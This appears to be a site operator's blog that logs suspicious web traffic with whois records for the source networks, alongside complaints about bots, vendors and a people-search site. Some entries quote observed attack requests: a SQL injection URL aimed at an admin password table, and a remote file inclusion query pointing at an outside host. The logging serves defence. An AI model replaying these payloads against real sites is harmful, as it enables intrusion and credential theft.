I hope someone at Norton Online Backup reads this at a higher level because I'm sure calling the support staff is going to send me to some low level tech support person that will be annoying to talk to. Maybe I will try that when I have more time and a day to waste on the phone. Why can't anything just work?

GoDaddy Hacking - Same as my last post

Same as the last post, a server with an old browser apparently has record of all the pages in a particular site and is scanning it, even though the software scanning the site cannot actually see the pages - they are blocked.

Clearly this is some kind of software copying our site or at least all the links in it again most likely for nefarious reasons.

IP Address: 72.167.94.65

OrgName: GoDaddy.com, Inc.
OrgID: GODAD
Address: 14455 N Hayden Road
Address: Suite 226
City: Scottsdale
StateProv: AZ
PostalCode: 85260
Country: US

NetRange: 72.167.0.0 - 72.167.255.255

Dow Jones-Telerate: Copying our Web Site?

Getting some suspicious traffic from this network. Even after blocking them they are somehow able to scan every page in our site which tells us that basically they took a copy of the site and all the URLs in it. They cannot currently link from page to page because they are blocked, so obviously storing a copy of the whole site in a database somewhere.

We have contacted this network but the suspicious traffic continues. One of the email addresses in the whois information bounced.

Additionally the traffic is coming from an IE6 browser which generally (not always) indicates the work of hacker or malware.

205.203.134.197

OrgName: Dow Jones-Telerate
OrgID: DOWJON
Address: 4300 North Route 1
Address: Bldg. 1
City: South Brunswick
StateProv: NJ
PostalCode: 08852
Country: US

NetRange: 205.203.96.0 - 205.203.159.255

Old Browsers in Logs - Hackers

I would like to reject all old browsers that come to our site from Google advertising or otherwise. Looking at the networks that these old browser visitors come from, it is pretty clear that 99% of them are bots, software or competitors.

I wish Google would do something about this like disallowing ads for old, insecure browsers like IE6.

Microsoft Office 2007 is crap.

I just went to print a document on a friend's computer. I use a previous version of Office. My friend had 2007 but she never used it yet (not computer savvy). After using Word for over 15 years you think I would be able to figure out where they moved the print button. The UI is so ridiculous it took up five minutes searching around to find the stupid print icon.

FILE. PRINT.

Every other piece of software copied this model because everyone is used to it.

Whoever changed this is an idiot. Sorry. They are.

A huge loss of productivity in every office where every person that gets this the first time has to take 5 minutes (or longer if not computer savvy) to figure out how to print a document in Office 2007.

So if you're thinking of getting Office 2007 - consider that was just the print button. How many other things are your employees going to be trying to find and wasting time?

Why, Microsoft? Why?????

Slicehost - Bad Traffic

We seem to be getting a lot of bad traffic from the slicehost IP range.

OrgName: Slicehost LLC
OrgID: SLICE
Address: 4579 Laclede Avenue #258
City: St. Louis
StateProv: MO
PostalCode: 63108
Country: US

NetRange: 67.207.128.0 - 67.207.159.255

ThePlanet.com - bad traffic

Getting a lot of bad traffic from this network:

OrgName: ThePlanet.com Internet Services, Inc.
OrgID: TPCM
Address: 315 Capitol
Address: Suite 205
City: Houston
StateProv: TX
PostalCode: 77002
Country: US

ReferralServer: rwhois://rwhois.theplanet.com:4321

NetRange: 174.132.0.0 - 174.133.255.255

Amazon cloud traffic

After a bunch of odd traffic from the Amazon "elastic cloud" networks searching for pages that don't exist on our sites, one site's search engine rankings has dropped.

Coincidence, I don't know.

I do know that the Amazon traffic was bad and we've seen bad traffic from Amazon before.

Google Imposter

A Google Imposter hit our sites today from this IP:64.69.46.216

On this network:
OrgName: CoreExpress
OrgID: COEX
Address: 600 W. 7th Street
Address: Suite 360
City: Los Angeles
StateProv: CA
PostalCode: 90017
Country: US

NetRange: 64.69.32.0 - 64.69.47.255

ValueWeb and DomainPeople

If you register and host your site at Value Web (becoming Hostway) you will have a very difficult time getting your domain off their systems later, should you need to do that.

Be prepared to call 5 or 6 times, wait on hold eternally, and get a lot of inaccurate information.

You have been warned.

AOL Proxy Cache

I noticed this IP and related IPs were hitting our sites a ton:

207.200.116.13

A reverse look up of the domain shows this IP is:

cache-ntc-aa09.proxy.aol.com

I'm personally not a fan of other networks caching and hosting our content. That's bad for us because we cannot accurately track who hit our site when and how they found us.

This may be some email related cache but we'd also like to see those image hits if possible.

As far as I can tell this is not a positive thing for our site except to reduce bandwidth - but that's bad if we cannot tell who viewed the images in the mail so we can accurately measure email campaigns.

More PHP Hacker Traffic

We're seeing some hacker traffic from this network attempting to access this url:

/profile.php?name='+UNION+SELECT+1,password,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+FROM+webl_admin%23

CustName: Alwatan Newspaper
Address: Unknown
City: Muscat
StateProv: Oman
PostalCode:
Country: OM
RegDate: 2008-07-10
Updated: 2008-07-10

NetRange: 216.7.173.16 - 216.7.173.31
CIDR: 216.7.173.16/28
NetName: D393-ENG01-216-7-173-16-28
NetHandle: NET-216-7-173-16-1
Parent: NET-216-7-160-0-1
NetType: Reassigned
Comment:
RegDate: 2008-07-10
Updated: 2008-07-10

OrgAbuseHandle: DAM96-ARIN
OrgAbuseName: Data393 Abuse Manager
OrgAbusePhone: +1-303-268-1500
OrgAbuseEmail: abuse@data393.net

OrgNOCHandle: DNOC2-ARIN
OrgNOCName: Data393 Network Operations Center
OrgNOCPhone: +1-303-268-1500
OrgNOCEmail: noc@data393.net

OrgTechHandle: IPADM77-ARIN
OrgTechName: IP Administration
OrgTechPhone: +1-303-268-1500
OrgTechEmail: ip-addr@data393.net

CFNetwork

Getting hit with CFNetwork user agent from this IP: 24.41.43.231

OrgName: EARTHLINK, INC.
OrgID: EARTH-22
Address: 1375 PEACHTREE STREET
Address: LEVEL A
City: ATLANTA
StateProv: GA
PostalCode: 30309
Country: US

NetRange: 24.41.0.0 - 24.41.95.255


Seems to be a lot of odd traffic coming out of Atlanta networks lately.

Followsite on softlayer - misbehaving

Followsite bot hit our server over 70 times and appears to not be following robots.txt

Came from this IP:

74.86.223.42

SoftLayer Technologies Inc. SOFTLAYER-4-4 (NET-74-86-0-0-1)
74.86.0.0 - 74.86.255.255
ASX Networks ApS NET-74-86-223-40 (NET-74-86-223-40-1)
74.86.223.40 - 74.86.223.47

Wowrack - unidentified traffic

Web servers in this network appear to be trying to hit our server:

dotnetdotcom.org 208-115-111-240-SLASH28 (NET-208-115-111-240-1)
208.115.111.240 - 208.115.111.255
Wowrack.com WOW-ARIN-NET2 (NET-208-115-96-0-1)
208.115.96.0 - 208.115.127.255

Internode - Excessive traffic

We're getting excessive traffic from this IP range:

inetnum: 203.122.192.0 - 203.122.255.255
netname: INTERNODE1-NET
descr: Internode
descr: Internet Service Provider
descr: Adelaide, South Australia,
descr: Australia
country: AU

hacker - phpadmin

A hacker attempting to access phpadmin hit our server using perl from multiple networks.

URL contained:

/profile.php?name='+UNION+SELECT+1,password,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+FROM+webl_admin%23

User agent: libwww-perl/5.811

IP #1: 207.210.89.18

Network:

OrgName: Global Net Access, LLC
OrgID: GNAL-2
Address: 1100 White St SW
City: Atlanta
StateProv: GA
PostalCode: 30310
Country: US

ReferralServer: rwhois://rwhois.gnax.net:4321

NetRange: 207.210.64.0 - 207.210.127.255
CIDR: 207.210.64.0/18
OriginAS: AS3595, AS16626
NetName: GNAXNET
NetHandle: NET-207-210-64-0-1
Parent: NET-207-0-0-0-0
NetType: Direct Allocation
NameServer: DNS1.GNAX.NET
NameServer: DNS2.GNAX.NET
NameServer: NS1.GNAX.NET
NameServer: NS2.GNAX.NET
Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
Comment: ********************************************
Comment: Reassignment information for this block is
Comment: available at rwhois.gnax.net port 4321
Comment: ********************************************
RegDate: 2005-04-12
Updated: 2007-06-01

RAbuseHandle: ABUSE745-ARIN
RAbuseName: GNAX ABUSE
RAbusePhone: +1-404-230-9150
RAbuseEmail: abuse@gnax.net

RNOCHandle: ENGIN7-ARIN
RNOCName: GNAX ENGINEERING
RNOCPhone: +1-404-230-9150
RNOCEmail: engineering@gnax.net

RTechHandle: ENGIN7-ARIN
RTechName: GNAX ENGINEERING
RTechPhone: +1-404-230-9150
RTechEmail: engineering@gnax.net

OrgAbuseHandle: ABUSE745-ARIN
OrgAbuseName: GNAX ABUSE
OrgAbusePhone: +1-404-230-9150
OrgAbuseEmail: abuse@gnax.net

OrgNOCHandle: ENGIN7-ARIN
OrgNOCName: GNAX ENGINEERING
OrgNOCPhone: +1-404-230-9150
OrgNOCEmail: engineering@gnax.net

OrgTechHandle: ENGIN7-ARIN
OrgTechName: GNAX ENGINEERING
OrgTechPhone: +1-404-230-9150
OrgTechEmail: engineering@gnax.net

IP #2: 62.146.47.98

inetnum: 62.146.47.96 - 62.146.47.111
netname: JF-NETWORK
descr: JFNetwork
descr: 97346 Iphofen
country: DE
admin-c: JF113-RIPE
tech-c: GT-RIPE
status: ASSIGNED PA "status:" definitions
mnt-by: IPPARTNER-MNT
source: RIPE # Filtered

person: Jochen Freier
address: Ritterstr. 11-17
address: 97318 Kitzingen
address: DE
phone: +49 9321 9297990
nic-hdl: JF113-RIPE
mnt-by: IPPARTNER-MNT
source: RIPE # Filtered

person: Thorsten Grosse
address: IP Exchange GmbH
address: Am Tower 5
address: 90475 Nuernberg
address: DE
phone: +49 911 30950 000
abuse-mailbox: abuse@ip-exchange.de
nic-hdl: GT-RIPE
mnt-by: IPPARTNER-MNT
source: RIPE # Filtered

% Information related to '62.146.0.0/16AS15598'

route: 62.146.0.0/16
descr: IP Exchange GmbH
origin: AS15598
mnt-by: IPPARTNER-MNT
source: RIPE # Filtered

123people dot com is stealing content

The 123people dot com site is stealing and reposting personal information from social networks like Myspace, Facebook.com, LinkedIn.com, Amazon (people's wish lists) and zoominfo.

In addition to scraping sites and posting photos, links and personal data that is not publicly available on these social networking sites, 123people is posting completely bogus data about people including false addresses and fake information.

Facebook has been kind enough to get scraped content and photos from their web site removed from this site. Other social networks like MySpace, Linkedin, Google, Amazon and ZoomInfo have been contacted to do the same by users.

This company 123People has been contacted to remove various profiles but is apparently not doing this so far.

.Net Framework hitting sites

129.7.111.207 is hitting our site with .NET Framework/2.0

OrgName: University of Houston
OrgID: UNIVER-239
Address: Information Technology
Address: Computing & Telecommunication Services
Address: 4213 Elgin Blvd
City: Houston
StateProv: TX
PostalCode: 77204-1010
Country: US

NetRange: 129.7.0.0 - 129.7.255.255

lwp-trivial

Hit with a bot called lwp-trivial/1.41 from this IP: 128.114.48.94 - a university in California:

OrgName: University of California, Santa Cruz
OrgID: UCSC
Address: University of California, Santa Cruz
Address: UCSC Information Technology Services
Address: Communications Building
Address: 1156 High Street
City: Santa Cruz
StateProv: CA
PostalCode: 95064
Country: US

NetRange: 128.114.0.0 - 128.114.255.255
CIDR: 128.114.0.0/16

Dragonfly User Agent

Some kind of dragonfly user agent hit our site which appears to be possibly related to some type of open source content management system doing some dirty business.

The hit appears to be coming from:

Enmax Envision Inc. ENMAXENV-BLOCK2 (NET-72-29-224-0-1)
72.29.224.0 - 72.29.255.255
PlayStarMusic Corporation ENV-PM-72-29-233-160 (NET-72-29-233-160-1)
72.29.233.160 - 72.29.233.191

Clearwire Billing Issues

Something is really wrong in the Clearwire billing department. There's a whole web site dedicated to complaining about Clearwire which cannot be good for business:

ClearwireSucks.com

At first I was taken aback by this page as I had tried out this network and had an OK experience. It's not as fast as Comcast but obviously you can travel around. It's not as reliable as an AT&T or Verizon card - definitely less coverage - but it's a bit faster than a cellular card. I thought it could use some improvement working in transit - doesn't seem to switch between towers too well or pick up signals well when traveling - but sucks? I didn't think it was that bad...until...

I canceled. I called up and the woman told me to wait until after XYZ date and then I would avoid the cancellation fee. So I did. After that date I called a guy and said I wanted to cancel and the woman told me to wait until after that date. I told him I already went through the options with the other woman but I specifically told him I wanted to make sure I didn't get a cancellation fee so waited until after the date she gave me.

So a few weeks later - I get a $110 bill on my credit card. Hmm. I called them and waited on hold forever and some woman told me someone was going to take care of it. I submitted a dispute to my credit card company. The charge was reversed.

Two weeks later - Clearwire charged the cancellation fee to my card again! This time they pushed my card over the limit and caused me to incur additional fees. Once again I am reversing the charges...

It seems like something really fishy is going on over there at Clearwire. I mean yes, ok to charge me the fee once by mistake is annoying and time consuming but to charge the fee AGAIN after it has been disputed and reversed and I specifically followed the instructions they told me on the phone?

I wonder if there's some type of fraudulent activity going on in that billing department the company doesn't even know about which is causing them to get into this class action lawsuit over their billing practices shown on the ClearwireSucks.com site.

The sad thing is, I had a decent impression of Clearwire before all of this and I thought those people on that web site just couldn't read and follow instructions. I know for a fact I waited until after the date I was given on the phone, so now I know that probably the other people there aren't exactly crazy. Not to mention there are too many of them to be a coincidence.

I hope Clearwire can fix this issue because they have a really interesting business model and service and would be a shame for it to go under due to a simple problem in their billing department they cannot fix. It seems like they need to have some kind of better auditing processes and make sure what is communicated to customers is accurate and complete information.

Amazon cloud once again...

Once again someone on the Amazon cloud network is trying to access our sites in programmatic ways:

OrgName: Amazon.com, Inc.
OrgID: AMAZO-4
Address: Amazon Web Services, Elastic Compute Cloud, EC2
Address: 1200 12th Avenue South
City: Seattle
StateProv: WA
PostalCode: 98144
Country: US

NetRange: 75.101.128.0 - 75.101.255.255

Someone or something at A2 hosting attempted to access our sites using some sort of PHP client:

Internet 123, Inc. INTERNET-BLK-I123-3 (NET-69-39-64-0-1)
69.39.64.0 - 69.39.95.255
A2 Hosting, Inc. I123-069039089000-032004 (NET-69-39-89-0-1)
69.39.89.0 - 69.39.89.255

Hopefully Internet 123, Inc. and/or A2 Hosting, Inc. will take a look at this and do something about it.

The offending IP: 69.39.89.40 tried to access our sites with two different versions of PHP.

MCI / Proxy IT - bad traffic

Someone in this proxy IP range attempted to hit our sites with Python.

65.200.199.106 at 7/5/2009 10:46:19 PM

MCI Communications Services, Inc. d/b/a Verizon Business UUNET65 (NET-65-192-0-0-1)
65.192.0.0 - 65.223.255.255
Proxy IT UU-65-200-199-D6 (NET-65-200-199-0-1)
65.200.199.0 - 65.200.199.255

MCI shoudl really do something about this because clearly someone is using this proxy to attempt to do their dirty work.

Bot out of University of Toronto

BlogScope bot hit our sites from University of Toronto

128.100.20.21

OrgName: University of Toronto
OrgID: UNIVER-36
Address: Computing and Networking Services
Address: 4 BANCROFT AVENUE - ROOM 101C
City: TORONTO
StateProv: ON
PostalCode: M5S-1C1
Country: CA

NetRange: 128.100.0.0 - 128.100.255.255

University Santa Cruz - WGet hackers

Someone at the University of Santa Cruz is attempting to access our sites using WGET from this IP 128.114.48.95 at 7/7/2009 7:53:48 PM

OrgName: University of California, Santa Cruz
OrgID: UCSC
Address: University of California, Santa Cruz
Address: UCSC Information Technology Services
Address: Communications Building
Address: 1156 High Street
City: Santa Cruz
StateProv: CA
PostalCode: 95064
Country: US

NetRange: 128.114.0.0 - 128.114.255.255

Colin-Miller - hitting our sites with Java

Someone at Colin Miller in San Francisco, California is attempting to access our sites with some type of Java client.

Comcast Business Communications, Inc. CBC-SFBA-13 (NET-173-11-64-0-1)
173.11.64.0 - 173.11.127.255
Comcast Business Communications, Inc. CBC-CM-4 (NET-173-8-0-0-1)
173.8.0.0 - 173.15.255.255
Colin Miller-San Francisco-CA-18 COLIN-MILLER-SAN-FRANCISCO-CA-18 (NET-173-11-77-96-1)
173.11.77.96 - 173.11.77.111

Programmatic traffic from eNet / XLHost

Getting clearly programmatic traffic rom this network:

eNET Inc. ENET-XLHOST-2 (NET-173-45-64-0-1)
173.45.64.0 - 173.45.127.255
XLHost.com Inc XLHOST-OOFFER3-4941 (NET-173-45-84-80-1)
173.45.84.80 - 173.45.84.95

Managed Solutions Group - Malware

Someone attempted to get at our web server using a Java software client of some kind from this IP: 205.209.142.43

This Ip belongs to "Managed Solutions Group" in California:

OrgName: Managed Solutions Group, Inc.
OrgID: MSG-48
Address: 45535 Northport Loop East
City: Fremont
StateProv: CA
PostalCode: 94538
Country: US

ReferralServer: rwhois://rwhois.managedsg-inc.com:4321

NetRange: 205.209.128.0 - 205.209.191.255

Twiceler - still doesn't obey robots.txt

Getting tons of hits from twiceler bot - still not obeying Robots.txt file. The hits are quite excessive. If they don't stop may just block at the firewall level.

Some of the IPs:
38.99.44.105
216.129.119.42
216.129.119.12
216.129.119.44
216.129.119.40
216.129.119.49
38.99.44.102

Problem with MS Terminal Services / VPN

There is a problem with Terminal Services from Microsoft and/or Cisco's VPN product. When using the Cisco client and VPN with Terminal Services and my connection gets disrupted in some way when I am connected to my server, first of all I cannot reconnect to the VPN. Somehow the VPN/firewall thinks I am still connected perhaps or maybe the services on my machine get corrupted in some way and causes this problem.

The second problem is that after a reboot (potentially restarting some services would also resolve this) and I reconnect to my VPN, Microsoft Terminal Services on the computer to which I was connected says all the Terminal Service sessions are in use and I cannot get back into my box. This is a potential security problem if someone else was able to connect to that particular session. It doesn't make any sense that I would show as still being connected because one particular account is supposed to terminate on disconnect or log out and so I should be able to get back in on that account after the network disruption.

On the flip side, I've had a problem where a particular account using Terminal Services is NOT supposed to shut down on disconnect, and when I get booted off the VPN via a network disruption, that account would shut down even when in theory it should not. It seems like maybe that problem was fixed but a new problem has arisen as a result of whatever changed.

Service Provider Corporation

If you've seen Service Provider Corporation IP addresses in your logs and then tried to find information about the company you'll end up here:

http://www.wdspco.org/

OrgName: Service Provider Corporation
OrgID: SPC-10
Address: 442 Route 202-206 North
Address: # 485
City: Bedminster
StateProv: NJ
PostalCode: 07921-0523
Country: US

NetRange: 166.128.0.0 - 166.255.255.255
CIDR: 166.128.0.0/9
NetName: NETBLK-CDPD-B
NetHandle: NET-166-128-0-0-1

This is an organization that allocates IP addresses to various wireless providers. Presumably some odd traffic on our server is from AT&T since the user agent appears to be IPhones. However the IPhones are acting a little strange and using a lot of different IP addresses for what appears to be the same web request. I could be wrong. We'll have to dig into this a bit more...

The other problem with this organization is that it actually hides the true source of the traffic in some cases. Someone on this network actually hacked into my web mail provider one time and apparently was reading my email. This organization states on their web site on a page that is not search engine friendly:

The WDSPCo NIC administers and maintains the IP address blocks that are leased from ARIN. The NIC assigns IP address blocks to WDSPCo members on request in accordance to the WDSPCo IP Management rules and the ARIN IP rules.

The NIC is also responsible for the WDSPCo DNS server. The NIC maintains the server. They also update with member server information for the reverse DNS lookup table for the leased IP blocks. When requesting a new block of IP addresses, members can supply their DNS server names so that the NIC can assign those server names to the IP block on the DNS server at the time of allocation. IP blocks can be leased without DNS server assignments.

The problem here is that some of the traffic coming from this IP range appears to be under the cover of this organization's name and you cannot truly report the source of the bad traffic to the company from whence it came if the IPs have been leased to someone else and not appropriately identified. In my opinion this organization should be forced by law to list both their name AND the name of the wireless company that is sending traffic to your sites.

123People - illegal scraping and reposting of content

123People.com is illegally scraping and reposting content from other web sites.

Information posted on social networks is posted by people who allow that particular social network to display information, some of it public, some of it not. This particular site has posted public information on their web site which I did not make available to the public. They have also posted photos which they are not authorized to copy off the other web site where I had posted it.

When you contact a web site that has posted information about you and you want it taken down, the professional thing to do would be to remove it. In this case this site appears to be posting private information and then trying to get you to use a service to get it removed. This is really shady business practice. I would recommend NOT contacting the "free" services they list but rather contact a lawyer, search engines and elected officials to get these types of unwanted posting of personal information on the web to stop.

123People.com was probably just created to grab your information and post it publicly in a way you don't like with other bogus information, then send you to a third party to clean it up. They need to take responsibility for the content they are posting. Additionally their scraping practices should be illegal if they are not. 123People.com also posts so much bogus information - there should be a law against that as well and some recourse for people whose information has been posted inaccurately or against their will and the person posting it refuses to remove it.

A better approach would probably be to get a lawyer or blog about 123People as I have done so other people can be warned and find it - and also complain to Google and other search engines using their functions for doing so, and your elected officials to get laws in place that prevent posting private information without your consent on web sites.

Here is the information from the 123People web site - again don't pay they to take down things you didn't authorize them to post. There needs to be a better solution to this situation:
______________________________________________________________

How do I delete the search results on the 123people?

123people refers to information originating from the other publicly available websites on the Internet. All we do is provide the viewing of the real time search results available on the Internet in a clear and well-arranged way.

If you want to edit or to delete information, there are two possibilities:

1. Contact the original source
If you want to delete the contents, please contact directly the original source of the information. You can find the source by clicking on the small icon to the left of all displayed results. Your support team will take care of your request voluntarily and free of charge.

2. Professional Services
There are services that take care of their customers online. We have selected a few of those services that you can use. Please contact one of the services of your choice directly for further information.
www.reputationdefender.com
www.myonid.com

Indication: 123people accesses data that have been found on other websites by classical search engines such as Yahoo. Search engines save the found information for certain period of time. These search engines do not explore all websites at the same time – that depends on how often the content on the website is updated, amongst other things – so it might take some time, (sometimes even months), until certain content has disappeared from the search results of big search engines. The information may appear on the site of 123people even if the source of the information has already been deleted.

The web site www.reputationdefender.com as well as www.myonid.com are independent companies who offer their services for free and do not stand in any form of cooperation with 123people.

Embarq Corporation - Malformed web requests

We are getting malformed web requests from this IP address on the Embarq Corporation network:

67.237.204.65

In fact we have seen a lot of bad traffic from Embarq network address ranges in the past.

OrgName: Embarq Corporation
OrgID: EMBAR
Address: 500 N New York Ave
City: Winter Park
StateProv: FL
PostalCode: 32789
Country: US

NetRange: 67.232.0.0 - 67.239.255.255

XLHost - Trying to access our sites progammatically

XLHost IP ranges continue to try to access our sites programmatically:

eNET Inc. ENET-XLHOST-2 (NET-173-45-64-0-1)
173.45.64.0 - 173.45.127.255
XLHost.com Inc XLHOST-DTODD1-5959 (NET-173-45-70-176-1)
173.45.70.176 - 173.45.70.183

Bad requests - Verizon

Got over 1200 bad requests from this IP on the Verizon network today: 71.176.87.58

OrgName: Verizon Internet Services Inc.
OrgID: VRIS
Address: 1880 Campus Commons Dr
City: Reston
StateProv: VA
PostalCode: 20191
Country: US

NetRange: 71.173.96.0 - 71.180.255.255
CIDR: 71.173.96.0/19, 71.173.128.0/17, 71.174.0.0/15, 71.176.0.0/14, 71.180.0.0/16
NetName: VIS-BLOCK
NetHandle: NET-71-173-96-0-1
Parent: NET-71-0-0-0-0
NetType: Direct Allocation
NameServer: NS1.BELLATLANTIC.NET
NameServer: NS2.BELLATLANTIC.NET
NameServer: NS2.VERIZON.NET
NameServer: NS4.VERIZON.NET

Strange requests / odd headers

We're getting strange requests on our server for files we don't host like this:

ip: 69.72.169.233

query string: path[docroot]=http://barrasford.net/barras/1.swf??

Fri Jun 26 15:39:20 PDT 2009

User Agent: Mozilla/5.0

Headers:

TE: deflate,gzip;q=0.3

Connection: TE, close

author.dll

A bot called core-project is coming from different URLs and attempting to access something called author.dll on our server:


6/19/2009 11:03:08 PM 125.244.77.2 /_vti_bin/_vti_aut/author.dll core-project/1.0 POST
6/18/2009 3:14:16 PM 62.212.123.125 /_vti_bin/_vti_aut/author.dll core-project/1.0

Alaska Communications Group

Based on recent activity on my server, I have a hunch there are hackers coming out of this network but couldn't prove it at the moment. Will have to keep an eye on this...

OrgName: Alaska Communications Systems Group, Inc.
OrgID: ACSG-1
Address: c/o ACS Internet, Inc.
Address: 600 Telephone Ave.
City: Anchorage
StateProv: AK
PostalCode: 99503
Country: US

ReferralServer: rwhois://rwhois.acsalaska.net:4321

NetRange: 216.67.0.0 - 216.67.127.255

Turnitin Bot - Odd behavior

Turnitin bot is requesting pages and types of technology that hasn't existed on one of your sites for years - probably over five years.

First question is - where are they even getting these links?

Second question is - why are they not obeying robots.txt for this site?

Turnitin bot is on this network:

O1.com NETBLK-O1-BLK4 (NET-65-98-128-0-1)
65.98.128.0 - 65.98.255.255
iParadigms, LLC NETBLK-65-98-224-0 (NET-65-98-224-0-1)
65.98.224.0 - 65.98.224.31

SuperPages Bot - Bogus Requests?

The SuperPages bot is submitting web requests that don't appear to be true. I'm not even sure if this bot is really from super pages. It lists a particular web page as the referrer, but after visiting that web page, there are clearly no links to our sites on that page. Obviously the bot is making up bogus information that could skew marketing results. I hope people are also not paying for bogus clicks from this company as a result of this activity.

The IP address from which the bogus web request came: 151.138.13.244

Suspicious Login Activity

I just logged into my web server. First connect to VPN, then type in admin password.

I typed in the administrate password numerous times. I know it was exactly the right password. I must have typed it 10 or 20 times. I even typed it out in notepad so I could see what I was typing to verify I was typing the right thing.

About the 20th attempt - suddenly the password worked. This is the same password I typed each time over and over again very carefully after it failed the first few times.

Something very strange is going on...time to change passwords.

AT&T Wireless - Reports people in Florida when Not

AT&T Wireless reports people as logging in from Florida using their laptop connect cards when they are at the opposite side of the country. You'd think with all the work on with GPS and the government mandate regarding pinpointing people's locations when they are on cell phones for 911 calls that they would also accurately pinpoint locations when using laptop connect cards.

This is the network you get when you look up the associated IP addresses:

OrgName: AT&T Global Network Services, LLC
OrgID: ATGS
Address: 3200 Lake Emma Road
City: Lake Mary
StateProv: FL
PostalCode: 32746
Country: US

NetRange: 32.0.0.0 - 32.255.255.255

Perhaps this is for security reasons or otherwise, I'm not sure, but if they are serving up an IP in LA or Seattle it seems like they could pull it from an associated IP range mapped to that city so locations can be accurately reported in logs. This is another hole for cyber criminals - like AOLs IP address reporting which basically does the same thing. Everyone is in Virginia according to their IP ranges.

And by the way those ads "I just found the Internet" in all these out of the way places - AT&T Wireless doesn't work in the heartland in Wisconsin. It may be a little remote compared to a large city but it's not exactly Timbuktu. There are a bunch of towns out there with a significant enough population to have a Walmart that don't have any coverage.

Mail.Ru/1.0 not obeying Robots.txt

This bot Mail.Ru/1.0 read robots.txt, ignored it and tried to access a page anyway from this IP address 94.100.181.242

GoogleImageBot - Annoying

We have a site where we disallow the google image bot. We started putting the photos on a subdomain of that web site. Google-bot apparently scanned and put all the images on that subdomain on the net even though our robots.txt file for that site tells Google to bug off and there's no link to those images except from our site.

RUDE.

This is probably going to cost monetary loss for our business since people keep trying to rip off these images that are totally unique to our business.

Comodo - unwanted traffic

There is some obvious web request manipulation going on from this network which hosts the "comodo SSL checker" bot:

inetnum: 91.209.196.0 - 91.209.196.255
netname: COMODO
descr: Comodo CA Ltd
country: GB

FollowSite Bot

FollowSite Bot ( http://www.followsite.com/bot.html ) is not obeying robots.txt on our server.

AOL Hacker

We clearly get bombed with abusive traffic repeatedly by someone on AOL. We've reported this malicious traffic to AOL a number of times and still it continues. We've finally just had to completely block the IPs in this range:

205.188.116.0-205.188.117.255

Hopefully one of these days AOL will do something about malicious traffic on their network when it is reported. They had a habit of blocking spammers which I thought was pretty cool even though we inadvertently got blocked once. We were able to contact them and fix the problem.

Now the tables are turned - AOL won't fix this problem so we have to block some traffic from their network.

The problem is not a bunch of AOL traffic. That's great. The problem is the traffic is clearly not right because it comes in excess from a multitude of IP addresses and different sessions. If it were one user looking at all the pages, the traffic should have the same IP address and session throughout the visit.

Please AOL...read your abuse@aol.com emails and fix problems like this.

Websense

After asking Websense to please stop hitting our web sites with clearly altered or bogus traffic - they proceeded to hit all our web sites repeatedly with such traffic. This is not very nice behavior. They could have emailed me back to explain what they are doing and why instead of trying to continue to bomb our web sites.

Websense does security research which I appreciate, however I do not appreciate the bogus traffic they are sending to our web sites constantly. A check once in a while would be fine but they hit the sites repeatedly every day. This seems a bit excessive.

Seriously we have a handful of local sites. Do they need to hit them three times a day??

Websense (WEBSEN-1)
Websense Network Operations Center (WNOC-ARIN) arin@websense.com +1-858-320-8000
Websense, Inc (AS13448) WEBSENSE 13448
Websense TWTC-NETBLK-4 (NET-66-194-6-0-1) 66.194.6.0 - 66.194.6.255
Websense Inc12036038 SBC06711720112828040601125225 (NET-67-117-201-128-1) 67.117.201.128 - 67.117.201.143

Bad request - Pocketinet

Our web servers just went down for some reason. Right before the problem we got a bad web request from this ip address and network ...and additionally they attempted to access the site using Wget.

64.185.119.190

Pocketinet Communications, Inc POCKETINET-1 (NET-64-185-96-0-1)
64.185.96.0 - 64.185.127.255
PocketInet POCKETINET-BG-2 (NET-64-185-119-128-1)
64.185.119.128 - 64.185.119.255

Strange traffic - related?

Getting some weird web requests right now and wondering if traffic from these IPs are somehow related:

209.112.190.24

OrgName: Alaska Communications Systems Group, Inc.
OrgID: ACSG-1
Address: c/o ACS Internet, Inc.
Address: 600 Telephone Ave.
City: Anchorage
StateProv: AK
PostalCode: 99503
Country: US

72.192.71.233
Cox Communications Inc. NETBLK-COX-ATLANTA-11 (NET-72-192-0-0-1)
72.192.0.0 - 72.223.255.255
Cox Communications NETBLK-OK-RDC-72-192-64-0 (NET-72-192-64-0-1)
72.192.64.0 - 72.192.127.255


69.50.139.225
NationalNet, Inc. NATL-MACH10-NET (NET-69-50-128-0-1)
69.50.128.0 - 69.50.143.255
WTS MACH10-WTS (NET-69-50-139-128-1)
69.50.139.128 - 69.50.139.255

170.35.224.64
OrgName: BellSouth Cellular Corp.
OrgID: BCC-12
Address: 12555 Cingular Way
Address: Suite 4360
City: Alpharetta
StateProv: GA
PostalCode: 30041
Country: US

NetRange: 170.35.0.0 - 170.35.255.255

SuperPages bot traffic

Why is the SuperPages bot

a.) not obeying robots.txt
b.) getting referred from this web site: http://www.clearwatergazette.com
c.) hitting a site that we are not running super pages ads on...

The traffic is coming from:

OrgName: Idearc Media Corp
OrgID: IMC-97
Address: 2200 W Airfield Drive
City: DFW Airport
StateProv: TX
PostalCode: 75261
Country: US

NetRange: 151.138.0.0 - 151.138.255.255

MSR-ISRCCrawler not obeying robots.txt

Strangely, MSR-ISRCCrawler checked robots.txt. It clearly says in our robots.txt file that this bot is disallowed. Then it proceeded to crawl our site anyway. Hmm...

Cogentco - bad traffic again.

38.100.41.112

Cogentco is at it again. Actually now when you look up this IP address it doesn't say Cogentco anymore it says PSINet but same thing. They are hitting our sites with clearly garbage traffic. We've blocked them out and show a blatant error message to stay away and yet they persist.

It's pretty clear that the traffic in question is both automated and not valid as this particular IP: 38.100.41.112 has just hit all the pages in a site selling -- Christmas wreaths.

In June.

Cogentco / PSINet traffic is bad news. You may want to watch and potentially block it on your server.

OrgName: PSINet, Inc.
OrgID: PSI
Address: 1015 31st St NW
City: Washington
StateProv: DC
PostalCode: 20007
Country: US
NetRange: 38.0.0.0 - 38.255.255.255

Today's Robot.txt file

If you're trying to prevent most automated traffic except major search engines on a particular web site heres a robots.txt file. Note that not all these are actually bots and some things like Python, Perl and Java agents running around the Internet and used by hackers don't obey or even check robots.txt so you'll have to use other ways to monitor and handle this traffic on your web site.


User-Agent: FollowSiteBot
Disallow: /

User-Agent: nambu
Disallow: /

User-Agent: uberbot
Disallow: /

User-Agent: KaloogaBot
Disallow: /

User-Agent: Yeti
Disallow: /

User-Agent: Servage
Disallow: /

User-Agent: ServageRobot
